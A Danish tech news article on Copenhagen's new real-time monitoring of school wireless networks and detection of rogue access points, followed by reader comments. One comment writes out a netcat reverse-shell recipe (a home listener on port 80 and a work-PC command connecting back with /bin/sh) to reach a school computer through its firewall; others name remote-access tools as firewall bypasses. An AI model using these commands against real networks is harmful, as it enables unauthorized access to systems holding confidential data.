København forbedrer overvågningen af skolers trådløse net
Københavns Kommune kan nu overvåge de trådløse netværk på 65 grundskoler og seks specialskoler i realtime med et helt nyt system.
»Det er en sand velsignelse. I hvert fald i forhold til tidligere hvor vi ikke havde noget realtime overvågningssystem. Dengang kunne vi først reagere når noget var gået galt, for vi fik ikke nogen dynamisk rapportering, og vi var altid tre skridt bagefter,« udtaler it-koordinator Jørn Kästel, Københavns Kommune, i en pressemeddelelse.
»Nu er vi med, og vi kan også til en vis grad være lidt proaktive,« udtaler it-koordinatoren.
Det er Uni-C's overvågningssystem til trådløse net, Uni Wireless Management, Jørn Kästel bruger til at løse opgaven.
»Det første jeg gør om morgenen, er at slå op og se, hvordan det ser ud på skolerne. Hvor mange AP'er (access points, red.) er nede? Hvor stor er belastningen på de enkelte AP'er? Og så kan jeg ellers lave en generel driftsovervågning,« forklarer Jørn Kästel.
Derudover kan Jørn Kästel se, om der er fremmede access points på skolernes interne net.
»Det kan for eksempel være en skolebetjent, der har sat sit eget trådløse net op, det har vi været ude for. Og det er meget, meget vigtigt at der ikke er nogen fremmede AP'er på den enkelte skoles interne net. For i værste fald kan det jo for eksempel betyde, at fremmede kan få adgang til filer med fortroligt indhold på vores administrative net,« udtaler Jørn Kästel.
Der er dog stadig dårlig dækning på en del skoler. Det skyldes, at ikke alle af de i alt cirka 900 access points endnu er blevet sat op.
Samtidig mangler Jørn Kästel at lægge tegninger af de enkelte skoler ind på managementsystemet. Når det er gjort, vil han med det samme kunne se, hvilke access points, der er problemer med ude på de enkelte skoler.
Ifølge Jørn Kästel er der dog allerede nu sket fremskridt.
»Rent resursemæssigt er der sket en væsentlig forbedring. Det nye managementsystem har betydet at vi kommer til at bruge færre resurser på trådløse net, også selvom antallet af AP'er vil stige i de kommende år.«
Kommentarer (6)
Jeg undre mig lidt over hvordan de ka' se det? En AP's ip-adresse behøver slet ikke ligge i samme område som det øvrige netværk. En AP - mine er i hvert fald - er fuldstændig tranparente. Man bruger kun ip-adressen når de skal konfigureres.
I øvrigt er det ikke kun sådan, som beskrevet med 'skolebetjent' de skal passe på. Jeg lod engang min PC være tændt på mit arbejde og satte en modem til. Jeg kunne så ringe ind hjemmefra og få adgang til netværket. Det er godt nok 15 år siden, men fantasien har som bekendt vide grænser.
-
0 -
0
Og man må da håbe skoler i Københavns Kommune har bedre beskyttelse af det administrative net, så man på det trådløse neyværk ikke har adgang til file med fortrolige oplysninger uden en konto med password.
Hvis 'skolebetjenten' ikke har adgang til et modem, kunne betjenten, inden han ta'r på arbejde starte sin internetforbundne PC med et *nix OS der hjemme og skrive kommandoen:
nc -l -p 80
Det er de færeste firewalls der blokerer for port 80. Så når han så har fyraften, genstarter han sin PC med en Linux Live CD i drevet og skriver:
nc [sin egen ip-adresse der hjemme] 80 -s /bin/sh
Nu har 'skolebetjenten' adgang til en kommandoprompt på sin arbejdscomputer hjemmefra, over internettet gennem skolens firewall.
-
0
-
0
Og endnu nemmere:
Han starter TeamViewer på sin arbejdspc, noterer ID og password, kører hjem, starter TeamViewer, indtaster ID og password og han har nu fuld GUI adgang til sin computer.
-
0
-
0
Men kan teamviewer omgå firewallen? En router med NAT blokerer for trafik, mens den tillader udgående trafik. I ovenstående eksempel med Netcat, er det nc på arbejdskomputeren der starter forbindelsen. Det kaldes for 'shoveling a shell'.
Jeg skulle nok ha' skrevet: Det er de færeste firewalls der blokerer for udgående trafik på port 80.
-
0
-
0
Jeg har ihvf. aldrig oplevet problemer på den front, og jeg har da oprettet forbindelser frem og tilbage fra Holland, Spanien, England og Danmark uden problemer.
De skriver da også på deres hjemmeside, at man ikke skal tænke på NAT, firewalls mv. Hvordan det virker bag facaden skal jeg ikke kunne svare på, men mon ikke det er noget med, at den opretter en forbindelse til en central server?
-
0
-
0
Logmein installerer en lille klient på den pågældende maskine og man logger derefter ind via et webinterface, hvor man nu end er.
Klienten sørger for at lave forbindelse til en server og holde, derfor vil det også virke gennem diverse firewalls.
https://secure.logmein.com/US/home.aspx
Så skal man kun huske på sit brugernavn + password, fremfor skiftende IDs mm.
-
0
-
0
